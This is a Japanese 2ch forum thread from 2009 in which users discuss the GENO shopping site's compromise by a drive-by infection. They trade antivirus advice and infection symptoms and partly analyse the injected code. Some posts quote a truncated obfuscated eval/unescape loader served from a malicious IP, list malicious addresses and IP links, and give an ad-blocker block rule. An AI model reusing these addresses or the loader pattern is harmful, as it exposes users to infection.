本スレいったら社員がgenoに罪はないとか必死でワロタ

459 : SM-3(東日本):2009/04/05(日) 15:48:33.10 ID:cMOqdWaO
>>457
avastも昨日時点では反応してない。

460 : PAC-3(長屋):2009/04/05(日) 15:49:41.33 ID:uFWmaItI
>>139
俺もカスペしようとしたらこれだわ

461 : PAC-3(アラバマ州):2009/04/05(日) 15:50:06.32 ID:fZeQqQHh
Geno宣伝しまくりでうざかったしメシウマ

462 : 九条(茨城県):2009/04/05(日) 15:50:08.27 ID:ZtOoCpyB
あヴぁstさんうpだてきたわぁ

463 : SM-3(catv?):2009/04/05(日) 15:52:05.91 ID:bm2EYdTj
        ゙!:|:::::|::l::|:l::l:;l斗:::‐!| |:::li| l::::::十!‐+|::_l:::li::::/,小、{_イ^| ト、ヽ,)
        /ハ:::::!::l::l:{::!::l:::! ::::l:| |:::li| ゙!::::::ト!:::::l:li:::トl:l└vオ  l |/| ゙Y
        / ハ::::!::!:l:|::!゙y,ァネ宀、` ヾヾヽ ,ァ7=!t、:l::|:l:i (勹 j j/}| |  
         / /  ヾミ:l::|ヾYオ゙h ::::::}      1i .::::ヽ!:|:li と,フ / !Y::| |
        ヽ/    l`:::`:l|:i ビ_''ツ       ト!、:;;;;::リト川(イリ/ /i::i:l:| |
   あ、バスト? .|:: ::j:!:kXxx  .     `ー--'/,';!::!j゙Y,/ /::|::i:|:| |
              |:: :l:l:ilヽ、   、     xXxx//// }j"lヽ/ :::l::l:|:L_」
               |:: :l:|:l:|:{:{> 、       ,. ァ' /⌒アヶ-<|:: i::::|::l:|l
                | :: :l:|:l:|:}宀<⌒i` ┬ '  ,ィ⌒7‐宀 <,r少t:」::::|::l:|l
             j :: :l:|:l:ノ   ヽ l _/」 ,ィ⌒i 丿    ヾ  」:l:::|::::|l   
           ,' ::;:'i'f~ ヽ、  ゙!ノ ノ,〃fーケ′      ゙{ ̄ {:l::|::::l:l、
           / :;:'/j) 、  )ー' ` 7/ヒ ^Y′        ヒ二 Y::|::::l::li 
            /::;:'/:;に._>r',rュ、__,//,f'^ン′ !       L.__了::l::::|::l:i、 
.          /:;:'/::;r'メ-{ ̄Y^y-‐‐f゙ }ノ{  ヽl      ト、 `)!| ::|::l::l 
          l::;'/::;〆  ,ンーヵヘ、__」 ,K‐ )  ゙!      |/`y{ |::| ::|::|::|    
            レ/〆  /  / j   | | l に(   l      |ヽj | l:::| ::|::|::|
            ヒY    \_,/ {__」 ゙!{ ト、_}   l       !'´//j リ !j }l/  
           ヒt.              Y__丿   l     |〃/ / 〃/    
          込             ヒ_ )    ノ!       ! / /   /
           `心_          ヽ-} _/ ,ハ      l      
                  `‐n 、 _    _ _ }'う「   / _!     ト

464 : PAC-3(長屋):2009/04/05(日) 15:52:25.55 ID:uFWmaItI
カスペアメリカ版ならできたわ

465 : SM-3(三重県):2009/04/05(日) 15:53:03.33 ID:gN5GNh7a
AVG更新来たらおしえてくれ

466 : SM-3(福岡県):2009/04/05(日) 15:53:06.12 ID:84v8s+/1
昨日クリーンインストしたばっかなのにふざけんな

また一日つぶれんのかよ……

467 : PAC-3(アラバマ州):2009/04/05(日) 15:54:05.37 ID:3fuyKCnQ
>>443
そんなこと言うなよ…

あと、ここいら辺↓もIEの制限付きサイトに登録しとけば無問題だな。
http://124.83.167.212/
http://66.249.89.147/
http://206.223.150.96/

468 : PAC-3(東京都):2009/04/05(日) 15:55:43.54 ID:zhQuEDAq
このスレ開いたらビューアが自動的にgenoにアクセスして
サムネ取得してるんだがこういうのって大丈夫なのかなぁ

469 : PAC-3(コネチカット州):2009/04/05(日) 15:55:54.50 ID:iHIQ45qr
潰れろよ胡散臭いし

470 : PAC-3(関西地方):2009/04/05(日) 15:56:57.95 ID:3U7OVFzS
>>457
ほんの数年前まではNortonもNOD32も評価高かったのになあ。セキュ板が崩壊してるからどれが良いのかわからん。
KasperskyかG-DATA辺り選んどけばいいの?

471 : PAC-3(兵庫県):2009/04/05(日) 15:57:52.08 ID:LtYrDB9k
ウィルスソフト無料配布しろよ糞GENO

472 : SM-3(福岡県):2009/04/05(日) 15:58:24.78 ID:NYT+ZU4h
前スレにもあったけど火狐+Adblock Plusのやつは
*/94.247.2.195/*
をブロック要素の追加。

473 : SM-3(catv?):2009/04/05(日) 15:59:05.29 ID:G3IZnl5U
>>471
今配布してんだろアホか

474 : PAC-3(東京都):2009/04/05(日) 16:00:08.49 ID:4tmwDGGe
>>471
ウィルスソフトの無料配布なら今やってるじゃんw

475 : SM-3(三重県):2009/04/05(日) 16:00:22.33 ID:gN5GNh7a
お前らセキュリティソフトなに入れてんの?
フリーの防火壁入れたほうがいい?

476 : PAC-3(東京都):2009/04/05(日) 16:00:56.11 ID:/V7w2/WB
ぞーんあらーむ

477 : PAC-3(神奈川県):2009/04/05(日) 16:01:21.44 ID:2VNVFXU0
PCTool

478 : SM-3(アラバマ州):2009/04/05(日) 16:01:32.12 ID:Gsmh6aLE
来週中にでもID:3fuyKCnQの家に捜査員が向かいます

479 : SM-3(コネチカット州):2009/04/05(日) 16:03:08.36 ID:yr250UHm
知ってよかった これから被害者続出だろうな

480 : SM-3(長屋):2009/04/05(日) 16:03:26.88 ID:v0YiXEB0
>>471>>473-474
ワロタww

481 : SM-3(埼玉県):2009/04/05(日) 16:04:07.97 ID:XTMIglNd
GENO OUTLETの方、昨日踏んだんだけど、
トップページが壊れてただけだったよ
プラグインとか起動しなかったけど
通販サイトの方が不味いのかな?

482 : SM-3(アラバマ州):2009/04/05(日) 16:04:41.29 ID:p1i6EYrA
ID:3fuyKCnQ
こいつ他のスレにも無差別にリンク張ってたカスだろ
もっとやれよ

483 : SM-3(アラバマ州):2009/04/05(日) 16:04:44.39 ID:o0tkYFrM
>>475
ぞぬは更新するからいいぞ

484 : SM-3(長屋):2009/04/05(日) 16:05:24.06 ID:7FUXJC30
>>463
zip!!

485 : SM-3(アラバマ州):2009/04/05(日) 16:05:28.00 ID:o0tkYFrM
どうせ貼るのなら他に板にもいけよ

486 : PAC-3(長屋):2009/04/05(日) 16:06:02.61 ID:uFWmaItI
>>481
バックグラウンドで勝手に起動してバッファオーバーフローさせて管理のっとるんでしょ?
クリックしたけど何もなかったよってのはなんの確証にもならないんじゃないの


487 : PAC-3(東京都):2009/04/05(日) 16:07:48.01 ID:zw/Kp8RX
これマカーもアウトなの?

488 : 九条(中国・四国):2009/04/05(日) 16:11:40.95 ID:kHvtMnjB
何も起きたように感じなくてもGENOサイト行ったならウイルスチェックは必要だと思うよ。
ウイルスの無料配布のGENOかあ、金貰ってもいらん。

489 : PAC-3(catv?):2009/04/05(日) 16:12:39.08 ID:PvyV0pvn
俺の個人情報がもれた可能性があることに対してすごく遺憾だ

490 : SM-3(栃木県):2009/04/05(日) 16:13:00.59 ID:R4PNdgDJ
553 名前:名無しさん[sage] 投稿日:2009/04/05(日) 16:02:30 0
webのことは店舗では分かりません


期待通りの回答
さすがだ

554 名前:名無しさん[sage] 投稿日:2009/04/05(日) 16:04:33 0
>>553
電話したの?
ご連絡ありがとうございます程度も言わなかったの?

555 名前:名無しさん[sage] 投稿日:2009/04/05(日) 16:08:47 0
本社の責任者に連絡すらもしないのかw
緊急時に連絡しないなんてありえない

491 : SM-3(関東):2009/04/05(日) 16:13:43.61 ID:yebre4Zj
AdobeReaderはバージョン9でゼロデイ攻撃が発生して
この前9.1になったばっかりだな
このスレ開いた人間は>>1のリンク踏むより何より先に
WindowsUpdateの実行とAdobeReaderとFlashPlayerのバージョンアップをしましょう

492 : 九条(チリ):2009/04/05(日) 16:14:57.06 ID:PeSp+Eht
NoScript最強伝説

493 : SM-3(東京都):2009/04/05(日) 16:15:21.46 ID:860lpsay
ID:3fuyKCnQ
てめ、他のスレに貼るなよ。シャレになってないぞ。

494 : 九条(dion軍):2009/04/05(日) 16:15:58.12 ID:HMm3lUCy
こういうのは無差別に攻撃しててその結果発覚したのが偶然Genoだった
というだけなんだけど、他のサイトも攻撃されている可能性が高い
価格.comのときも一番有名だったのがそれだっただけで
他にもいくつか被害が出てた

Genoと同じサーバ構成のところは要注意かもな
Server: 4D_WebStar_D/2004
聞いたことないと思って調べたけどMac系のWebサーバみたいだね
どうのっとられたのかはわからないんでなんともいえんけども

495 : PAC-3(神奈川県):2009/04/05(日) 16:16:11.29 ID:ZKuqs6we
各最新版
http://get.adobe.com/jp/reader/
http://get.adobe.com/jp/flashplayer/

496 : ボロニア・ピンナタ(アラバマ州):2009/04/05(日) 16:18:17.72 ID:3fuyKCnQ
http://122.221.10.232/
http://122.221.10.234/

ノシ

497 : マンサク(長屋):2009/04/05(日) 16:19:24.46 ID:uFWmaItI
flash 10,0,12,36
adobe 8.13
win最新

でもJaneStyleで>>366クリックしただけだし
そもそもつながらんかった。一応nifty版カスペでスキャンしとる。

498 : ナツグミ(アラバマ州):2009/04/05(日) 16:19:41.94 ID:o0tkYFrM
>>496
URL!URL!

499 : クリサンセコム・ムルチコレ(埼玉県):2009/04/05(日) 16:20:00.98 ID:XTMIglNd
>>486
Acrobatリーダーか、フラッシュのプラグイン使って感染させるんじゃないの?
ソースチェッカーで、ソース見てみたけどPHPのエラーが出てるだけのような
確かにウィルススキャンは必須だと思います

500 : イブキジャコウソウ(福岡県):2009/04/05(日) 16:26:40.54 ID:NoTQ20I9
VMwareServer6.5
Windows XP Home Edition SP3 更新プログラム最新
Firefox 3.0.8
NoScript 1.9.1.6
AVG 8.5.258 270.11.41./2041
spybot 1.6.2.46
Flash Player 10,0,22,87
ADOBE READER 9.1.0 2009/02/27
(AGM 4.18.84 Cooltype 5.5.61 Core 9.256 JP2K 2.0.0.2579 ADM 9.01x0)

NoScriptだけで回避余裕でした

501 : シロバナタンポポ(アラバマ州):2009/04/05(日) 16:27:27.79 ID:b0h37uVC
昨年、ガールフレンド7.0からワイフ1.0にアップグレードしたところ、
思いがけないことが次々と起こり、困っています。

アップグレードして間もなく、チャイルドという名前のプログラムが
いくつもでき、容量をすごくとるので、お金をつぎこんで環境を
変えざるを得なくなりました。
さらにワイフ1.0は、他のプログラムに勝手に自分をインストールし、
全プログラムの監視をしています。
たとえばゴルフ3.1や飲み会5.0といったアプリケーションは、
動きが悪くなっています。キャバクラ6.2に至っては、まったく動きません。
選択するだけでクラッシュしてしまいます。

そこで、ワイフ1.0をガールフレンド7.0に戻したいんですが、
このワイフ1.0のアンインストールがうまくできません。
強引にアンインストールしようとすると、システム全体を
巻き込んでしまいそうです。
いい方法を教えてください。

502 : ジョウシュウアズマギク(東日本):2009/04/05(日) 16:28:14.35 ID:cMOqdWaO
今avastのフルスキャン終了したが問題ないみたいだ。

503 : 藤(catv?):2009/04/05(日) 16:28:15.68 ID:G3IZnl5U
>>497


504 : マンサク(長屋):2009/04/05(日) 16:28:47.72 ID:uFWmaItI
>>503
なんかいってみろや

505 : 藤(catv?):2009/04/05(日) 16:29:48.03 ID:G3IZnl5U
>>504
おまえはアホだ
安心しろ

506 : マンサク(長屋):2009/04/05(日) 16:30:03.28 ID:uFWmaItI
つまんね

507 : キバナノアマナ(福島県):2009/04/05(日) 16:31:55.15 ID:S7Wcn6Fr
>>418
geno開いたことないのに動いてる・・

508 : マンサク(長屋):2009/04/05(日) 16:32:43.08 ID:uFWmaItI
>>507
そりゃconimeくらい動くだろw

509 : 藤(catv?):2009/04/05(日) 16:33:37.32 ID:G3IZnl5U
>>506
言ってる意味がわかんないならとっとと再インスコでもすれば?



510 : シンビジューム(大阪府):2009/04/05(日) 16:34:02.94 ID:G8VueaaE
avast!で知らずに踏んだらAcrobat勝手に立ち上がったと思ったらavast!が警告出した。
ファイルを移動させて確認するとdosのコマンド?らしきファイルとEXEの二つのファイルが隔離されてた。
改めてそのそのファイルを検査すると警告がでた。
気持ち悪いのでavast!のフルスキャンかけたら、当然のごとく移動したファイルで警告出したから削除。

プロセス確認するもcmd.exeもconime.exeの起動もなし。
なんかすっきりしねぇ。

511 : ロウバイ(北海道):2009/04/05(日) 16:34:10.75 ID:siieqtSy
conime.exeでググれ。ビクつくな

512 : マンサク(長屋):2009/04/05(日) 16:34:17.48 ID:uFWmaItI
つまんね

513 : ヤマシャクヤク(埼玉県):2009/04/05(日) 16:36:20.00 ID:ChFo5dq/
動いてるプロセスを一個ずつググるのは基本だよね

514 : ユッカ(岡山県):2009/04/05(日) 16:37:45.32 ID:hpRAds5S
http://www.altech-ads.com/product/10001408.htm
ここのウイルス検知能力は割と高いのでしょうかね?
やってみたら数個感染していたけど。

515 : ツメクサ(アラバマ州):2009/04/05(日) 16:37:48.84 ID:2WZEeT4/
8.1.4は最新じゃないのか?
更新押しても最新と出る

516 : ムレスズメ(熊本県):2009/04/05(日) 16:40:44.92 ID:RbtJqnj5
>>515
9.1.0

517 : キバナノアマナ(東京都):2009/04/05(日) 16:42:37.26 ID:naZJf0Ij
レタスのベンチ完走しないんだが

518 : 藤(catv?):2009/04/05(日) 16:43:02.40 ID:G3IZnl5U
>>512
やーいアホ

519 : マンサク(長屋):2009/04/05(日) 16:43:02.59 ID:uFWmaItI
私operaだけどnoscript余裕でした

520 : サイネリア(兵庫県):2009/04/05(日) 16:43:12.90 ID:X13rObJO
踏んだけど3秒で閉じたからセーフ

521 : サイネリア(福島県):2009/04/05(日) 16:43:24.93 ID:EAFo8Z4c
avastで助かった
今avgとavastでウィルスチェック中
同時進行でspybotも

522 : オウギカズラ(三重県):2009/04/05(日) 16:44:15.57 ID:l/EDrTDv
なんもなんねぇ
って思ったけどそもそもAcrobat入れてなかった

523 : 節分草(埼玉県):2009/04/05(日) 16:44:25.57 ID:mJLYrE9p
それは紛れもなくセーフ

524 : ハマナス(コネチカット州):2009/04/05(日) 16:45:04.10 ID:uVA9mQjx
アクロバットリーダーってなに?火狐最新、ウインドウズアップデート最新、アドビリーダー9.1で踏んだら火狐がおちたけどやばいの?

525 : ムラサキハナナ(dion軍):2009/04/05(日) 16:45:24.91 ID:/mZc4qed
被害者数はどれぐらいになるんだろ

526 : トサミズキ(青森県):2009/04/05(日) 16:46:13.57 ID:eHrL9hCc
もう怖くてニュー速すべてのURL踏めない

527 : プリムラ・マラコイデス(埼玉県):2009/04/05(日) 16:46:22.73 ID:+SkOGION
>>524
アクロバットリーダー = アドビリーダー

528 : オオニワゼキショウ(福島県):2009/04/05(日) 16:47:31.01 ID:0Z1+i9H1
ウィルスバスター(笑)やらの調子悪いな、と思ったらgenoにアクセスしたのが原因だったんか
復元でどうにか元に戻せたみたいだけど、バックアップとって後日再インストールすっかな

529 : マンサク(長屋):2009/04/05(日) 16:49:54.54 ID:uFWmaItI
バスターとかマゾかよ

530 : ユッカ(岡山県):2009/04/05(日) 16:49:57.70 ID:hpRAds5S
>>526
GENOにとばされたら嫌だからね。

531 : ヘビイチゴ(アラバマ州):2009/04/05(日) 16:50:33.00 ID:lcX048f5
>>521
同時進行とか…

532 : マンサク(長屋):2009/04/05(日) 16:51:11.55 ID:uFWmaItI
>>521
spybot使ってるやつってまだいたんだ

533 : ジャーマンアイリス(神奈川県):2009/04/05(日) 16:53:06.44 ID:yiWCjpDW
やばい。 >>524

やばい。 >>524

やばい。 >>524

大事なことなので三回言いました。



534 : エニシダ(三重県):2009/04/05(日) 16:53:52.39 ID:RfG5Zn4/
アクロバット入れていなかったけどGENOで昨日買い物してしまったんだよな
avastでスキャンしても何も出てこなかったけどやばいかな


535 : ハマナス(コネチカット州):2009/04/05(日) 16:54:57.53 ID:uVA9mQjx
>>533\(^O^)/
教えてくれてありがとう。クリーンインスコすれば問題ないよな?いまからするわ

536 : サクラソウ(東京都):2009/04/05(日) 16:57:04.13 ID:i6IYQtZo
最近検査してなかったからスキャンしたら全然関係ないトロイが検出された
正直焦った

537 : オオタチツボスミレ(福岡県):2009/04/05(日) 16:57:47.82 ID:S8H8kLzU
なんか騒いでるのν速だけじゃね
+じゃスレもないし
vipじゃ祭りでもない
踊らされすぎじゃないのか・・・

538 : モクレン(関西地方):2009/04/05(日) 16:58:01.64 ID:l9dSRGF4
こんな状態で買い物する勇者は居るのか?
GENO使うような人は情弱層とは違うような・・・

土日売り上げ0とかwww
当分売り上げ落ちるだろうし、中の人は放置プレイなのか?

539 : オオタチツボスミレ(東京都):2009/04/05(日) 16:58:55.64 ID:x7q5iiF1
4年ぶりにクリーンインストールするかな。

540 : シラー・カンパヌラータ(中国・四国):2009/04/05(日) 16:59:15.88 ID:kHvtMnjB
>>534
GENOで買い物したのであれば感染してなくてもGENO側から漏洩の危険性あると思う。

541 : ヤブツバキ(栃木県):2009/04/05(日) 16:59:58.02 ID:5t3iiOD0
>>538
マゾなんだろう

542 : オオタチツボスミレ(東京都):2009/04/05(日) 17:00:24.30 ID:x7q5iiF1
統合DVD作るのマンドクソ

543 : シハイスミレ(神奈川県):2009/04/05(日) 17:01:15.43 ID:BDzFLV4T
>>537
VIPはともかく+でスレ立つわけねぇだろ

544 : ナツグミ(アラバマ州):2009/04/05(日) 17:02:25.16 ID:o0tkYFrM
寝ていた連中が起き始める頃だな
被害者増えそう

545 : カラタネオガタマ(東京都):2009/04/05(日) 17:03:14.16 ID:bLIrJw6u
害の無いウィルスは存在しても問題ない

546 : チャボトウジュロ(岩手県):2009/04/05(日) 17:04:05.55 ID:w+NqM58M
NOD32 定義データベース3988で検索中だが心配なってきたな

クリーンインストールしたほうが手っ取り早い気がしてきた

547 : マンサク(長屋):2009/04/05(日) 17:05:28.72 ID:uFWmaItI
対応セキュリティソフトのまとめは?

548 : シハイスミレ(神奈川県):2009/04/05(日) 17:06:38.43 ID:BDzFLV4T
>>546
3988じゃ非対応

549 : サイネリア(東京都):2009/04/05(日) 17:09:08.74 ID:Wtu0Z/3+
>>538
お詫びすらしないよ
多分

550 : チャボトウジュロ(岩手県):2009/04/05(日) 17:10:27.78 ID:w+NqM58M
>>548
非対応とな・・・
クリーンインストールしたほうが早そうだな

551 : ムラサキサギゴケ(アラバマ州):2009/04/05(日) 17:10:41.56 ID:6qNnCYZc
ASUS Eee PC 900A 19990円って欲しいな。

552 : カラスビシャク(長屋):2009/04/05(日) 17:14:18.42 ID:MFeZ/yCs
俺平気なんだけどアクロバットが5.0だから?

553 : チューリップ(東京都):2009/04/05(日) 17:16:08.05 ID:8zHBuNXr
で、そろそろ踏んでも痛くない予防・対策法はまとまったの?
・Adobe Reader/Acrobat/Flash Playerを最新版にする。

これ以外にあと何ある。


554 : プリムラ・インボルクラータ(福岡県):2009/04/05(日) 17:16:17.71 ID:FxWYTDzJ
今から統合DVDつくるのめんどくさいんでXPSP3のDVD無償配布してください

555 : ヤブテマリ(岐阜県):2009/04/05(日) 17:17:42.72 ID:BVjTlbXj
PFの使用量って通常どんなもんなの?

556 : フジスミレ(東京都):2009/04/05(日) 17:19:21.03 ID:8gpnjSZj ?2BP(7000)

>>552
windows98?

557 : カントウタンポポ(大阪府):2009/04/05(日) 17:20:15.41 ID:ELJz1ZXf
明日あたり、PCWATCH、ITMedia、ヤフTOP、GIGAZINEあたりのネタ確定。

558 : デージー(catv?):2009/04/05(日) 17:21:04.72 ID:8qu0s/C7
>>553
アドベ関係を全削除

559 : ヤブテマリ(関西地方):2009/04/05(日) 17:22:43.40 ID:Q5FuqTSp
アドビ入れてなかったら問題無いの?

560 : ムラサキハナナ(dion軍):2009/04/05(日) 17:23:28.15 ID:/mZc4qed
誰か凸電かメールしてないのかね

561 : シナノコザクラ(関西地方):2009/04/05(日) 17:23:28.74 ID:PJg+3svG
間違えてアクセスしてもつながらないように設定しとくといいよ

562 : キバナスミレ(関東・甲信越):2009/04/05(日) 17:25:01.57 ID:vha5s7Cg
>>553
俺AdobeReaderなしFlash最新版でその上Javaスクリプトoff、ActiveXもoffで踏んだのに感染した
ちなみにセキュリティソフトはNIS2009
今の所どんな対策しても感染は防げないんじゃないか

563 : シナノナデシコ(熊本県):2009/04/05(日) 17:25:57.96 ID:6CEeEDop
放置する理由がわからん
土日返上もんだろ・・・

564 : 藤(catv?):2009/04/05(日) 17:26:13.12 ID:G3IZnl5U
四カ所位に検体として送ってみたけど一件返事来た

565 : カラタネオガタマ(沖縄県):2009/04/05(日) 17:26:16.84 ID:/zVtIoXH
レックスマークのスタートアップとプロセス削除してる時に一瞬黒窓が開いた
と思ったらconime.exeが常駐してました。
conime.exe自体はコマンドプロンプトを開いた時に読み込まれる物のようだが、
なんでこのタイミングで…?

566 : スノーフレーク(catv?):2009/04/05(日) 17:28:06.32 ID:HNxMpJbh
WHOIS rezult?ti dom?nam/IP adresei: 94.247.2.195
inetnum: 94.247.2.0 - 94.247.3.255
netname: ZLKON
descr: ZlKon
country: LV
role: ZlKon HostMaster
address: Lilijas iela 4-74
address: Riga, LV-1055
address: Latvija
phone: +371 26330593
admin-c: AD5952-RIPE
tech-c: AD5952-RIPE
nic-hdl: ZK508-RIPE
mnt-by: ZLKON-MNT
source: RIPE # Filtered
abuse-mailbox: abuse@zlkon.lv

567 : ムラサキケマン(アラバマ州):2009/04/05(日) 17:28:15.73 ID:URFZ3t0d
>>565
同じ症状だ・・・一瞬何かが開いたと思ったらプロンプトだったか
conimeも確認

568 : スノーフレーク(catv?):2009/04/05(日) 17:28:21.65 ID:HNxMpJbh
role: DATORU EXPRESS SERVISS HostMaster
address: 18. novembra street 319C
address: Daugavpils, LV-5413
address: Latvia
phone: +371 26631339
fax-no: +371 65420725
remarks: Information: http://www.pcexpress.lv
remarks: Questions: hostmaster@pcexpress.lv
admin-c: IV745-RIPE
tech-c: IV745-RIPE

569 : シキミ(東京都):2009/04/05(日) 17:28:30.91 ID:jJAIwFLg
ブラウザとプラグインだけ再インスコじゃダメなの?

570 : エニシダ(三重県):2009/04/05(日) 17:29:14.07 ID:RfG5Zn4/
>>562
感染したってどうやってわかった?

571 : マーガレットタンポポ(千葉県):2009/04/05(日) 17:30:30.99 ID:X6n78VLY
>>569
泥棒が家の中にいるのにドアだけ変えればおk?
と言ってるようなもの。

572 : 姫カンムリシャジン(北海道):2009/04/05(日) 17:30:38.90 ID:SJFT5u/E
genoのサイトを開くと以下のURLが呼ばれるんだが

  94.247.2.195/news/?id=100 (IEの場合こっちが呼ばれる)
  94.247.2.195/news/?id=101 (それ以外の場合こっちが呼ばれる)

うちの環境ではどちらを開いても以下のコードしか出てこない。

  // No news...<script>
  var t=new Date(1148027392000);document.cookie="miek=1; expires="+t.toGMTString()+"; path=/";
  //</script>

ただcookieを書き込んでるだけ。よって何も起こらない。
しかしどうも前スレの報告によると、このURLにPDFやswfをダウンロードさせるコードが含まれてる場合もあるみたいなんだよな。
とりあえずうちでは攻撃が確認できないので、これ以上の解析は無理だ

573 : リナリア アルピナ(福岡県):2009/04/05(日) 17:35:03.91 ID:cH/yn/ac
とりあえずルーターでIPフィルタかけてみたら
やっぱりゲノのサイト繋がらないね
まさかラトビアの鯖借りてるワケでもなかろうに・・・


574 : ウグイスカグラ(愛知県):2009/04/05(日) 17:35:49.93 ID:cloa20iA
ウインドウズが起動しなくなってしまった
窓の画像出て読み込んでるところまでは行くんだが
どうすればいいの?;;

575 : リナリア アルピナ(福岡県):2009/04/05(日) 17:41:10.09 ID:cH/yn/ac
>>574
safe modeでやってみたら?


576 : エニシダ(群馬県):2009/04/05(日) 17:42:04.31 ID:Ca48GkkG
くそーー
感染してるか分からんからネットショッピングとかパス必要なこと一切できないじゃん!
誰か早く詳細を!

577 : キバナスミレ(関東・甲信越):2009/04/05(日) 17:42:12.62 ID:vha5s7Cg
>>570
アクセスしたらマウスの動きが重くなったんで、おかしいなと
そんでnetstatコマンド打ったら94.247.2.195と通信してた
そしたらコマンドプロンプトが突然落ちた
その後タスクマネージャ見たらconime.exeが動いてた

578 : アルストロメリア(長屋):2009/04/05(日) 17:44:39.93 ID:KozJbm+4
>>577
二行目でアウトだが
conimeはコマンドプロンプト開いたら一緒にあがってくるものだぞ

579 : チドリソウ(福岡県):2009/04/05(日) 17:45:45.86 ID:UF/PcuEl
>>577
cmdで日本語つかうならconime.exeは動くっしょ

580 : フデリンドウ(東京都):2009/04/05(日) 17:45:52.40 ID:Pt0pslUH
>>572
94.247.2.195/news/?id=100 のソースは
<script>
var a=new Array(43,38,13,7,25,1,60 長いので以下略
);eval(unescape('85cvaSUr%20sHFZ%3D"HFZ",k%3D 長いので以下略
cs);').replace(/Eu|SU|zbn|HFZ|85c|G7x|4Nr|Z0/g,""));
//</script>
ってなってる。
これを解読すると

・94.247.2.195/news/?id=2 をPDFとして開く
・94.247.2.195/news/?id=3 を開く

になる。というのは前スレ207で報告したとおり。

ユーザエージェントによって中身を切り替えてるんかね

581 : エニシダ(三重県):2009/04/05(日) 17:46:22.27 ID:RfG5Zn4/
>>577
詳細感謝。
ってことは上でも言われているようにconime.exeが動いているかどうかで感染が判断できそうだな。

582 : キバナスミレ(関東・甲信越):2009/04/05(日) 17:47:06.31 ID:vha5s7Cg
しかし再インスコめんどいな
メーカー製PCのリカバリディスクからXPSP3適用済みのインストールCD作る方法ないのかな
余計なソフトとか全部省いてOSだけのやつ

583 : シキミ(東京都):2009/04/05(日) 17:47:36.84 ID:jJAIwFLg
>>571
なるほど、ドア通る時に悪さするんじゃなく中に入っちゃってんのか

584 : キキョウソウ(アラバマ州):2009/04/05(日) 17:49:01.33 ID:uH6xtuH4 ?DIA(109092)

これがキーロガーだったらOS再インスコしたところで後の祭りだよね

585 : コメツブツメクサ(千葉県):2009/04/05(日) 17:49:52.29 ID:ly4oP7RG
ここは感染するのを楽しむスレだろ?




























俺も感染した

586 : シロウマアサツキ(福岡県):2009/04/05(日) 17:50:42.14 ID:Lsy4FUBe
カスペならオンラインウィルススキャンでも検知できる?

587 : キバナスミレ(関東・甲信越):2009/04/05(日) 17:50:43.99 ID:vha5s7Cg
>>578-579
cmd.exeはその時点で落ちてたんだけど、cmd.exe終了してもconime.exeのプロセスは残るのかな

588 : ヒメオドリコソウ(北海道):2009/04/05(日) 17:51:17.31 ID:7h0y+O94
conime.exeは問題ないだろ

589 : 藤(catv?):2009/04/05(日) 17:51:44.77 ID:G3IZnl5U
>>585
わかってんな

590 : シナノコザクラ(関西地方):2009/04/05(日) 17:52:31.52 ID:PJg+3svG
conime.exeは、起動後初めてコマンドプロンプトでIMEを有効にした瞬間に起動する
cmd.exeを閉じても残る

591 : ムラサキサギゴケ(アラバマ州):2009/04/05(日) 17:53:05.13 ID:6qNnCYZc
やったreader9.0入手したから感染できた。

592 : チドリソウ(福岡県):2009/04/05(日) 17:53:28.69 ID:UF/PcuEl
>>587
残るんでタスクマネージャーから終了させるといい

593 : オニノゲシ(コネチカット州):2009/04/05(日) 17:54:18.05 ID:etNvZp7q
avastならセーフなのか
ノートン解雇してavast雇用してスキャンするか。

594 : キバナスミレ(関東・甲信越):2009/04/05(日) 17:54:24.94 ID:vha5s7Cg
>>581
cmd.exe立ち上げた覚えないのにconimeが動いてたらアウトだろうね
感染の段階で裏でcmd.exe立ち上がるっぽい

595 : タチイヌノフグリ(東京都):2009/04/05(日) 17:54:32.21 ID:nFEhX3bu
やった感染できた

596 : キソケイ(愛知県):2009/04/05(日) 17:54:39.18 ID:Vw4dvWvo
genoまだなんも対応してねーの?

597 : シナミズキ(長野県):2009/04/05(日) 17:54:50.56 ID:G7po/5dP
こいつは感染したPCのフォルダとかデータとか、差したUSBメモリのAutorun.infに何か悪さするウイルス?
そうじゃないならファイルを外付けHDDに退避させてリカバリでおkだよね。

598 : カラスビシャク(長屋):2009/04/05(日) 17:55:36.45 ID:MFeZ/yCs
やっぱりなんともない俺のメインPC
XPでアクロバット5.0

599 : アルストロメリア(長屋):2009/04/05(日) 17:56:45.75 ID:KozJbm+4
どういうタイプのウィルスかわかってないあたりすげぇな
まさに未知子

600 : デージー(catv?):2009/04/05(日) 17:56:53.82 ID:8qu0s/C7
>>585
他人に迷惑かけるな、カス

601 : 姫カンムリシャジン(北海道):2009/04/05(日) 17:57:53.61 ID:SJFT5u/E
>>580
一応Win2k上でIEとFirefox、UA偽装してIE7 on WinXPを試してみたんだけど
どれも同じ結果しか返って来ないんだよな…
ランダムに返してるわけでもないだろうし、謎。

602 : サイネリア(東京都):2009/04/05(日) 17:59:05.31 ID:4tmwDGGe
かってにconime.exe動いてた。アウトっぽい
火狐とAdobeをアンインストして、フォルダも全部削除してから、
火狐とFoxitを再インストールしたらconime.exe出なくなった

603 : アルストロメリア(北海道):2009/04/05(日) 17:59:08.63 ID:bn8j3/Lf
やけにFOX落ちるなっておもたら、ウィルスですかい
大丈夫なんかね

604 : チャボトウジュロ(岩手県):2009/04/05(日) 18:00:06.83 ID:w+NqM58M
バックアップ取るためにいらないファイル消してたら
いきなりデータ実行防止が働いてexplorer.exeが落ちた
ついでにdrwtsn32もエラー落ち
なんだかオラワクワクしてきたぞ

605 : ショウジョウバカマ(神奈川県):2009/04/05(日) 18:00:53.91 ID:2VNVFXU0
NoScriptの偉大さがやっと理解できた

606 : ムラサキケマン(アラバマ州):2009/04/05(日) 18:01:02.95 ID:URFZ3t0d
netstatやったら
http://ja.wikipedia.org/wiki/%E3%82%A2%E3%82%AB%E3%83%9E%E3%82%A4%E3%83%BB%E3%83%86%E3%82%AF%E3%83%8E%E3%83%AD%E3%82%B8%E3%83%BC%E3%82%BA
ここと通信してたんだけど関係ないかな

94.247.2.195とは通信してなかったけどなんか怖いな

607 : ナガバノスミレサイシン(長屋):2009/04/05(日) 18:01:13.67 ID:05nfWoNq
>>572
ただのテキストにアクセスしてるわけじゃないんだし呼び出し元の状況で幾らでも書き換えできるだろ

608 : ライラック(関西地方):2009/04/05(日) 18:01:35.36 ID:Nx7XMpNe
ネットにアクセスする時は、vmwareにインストールしたバーチャルPCから
アクセスしてるから全然怖くないけどなw

609 : キバナスミレ(関東・甲信越):2009/04/05(日) 18:05:44.51 ID:vha5s7Cg
>>602
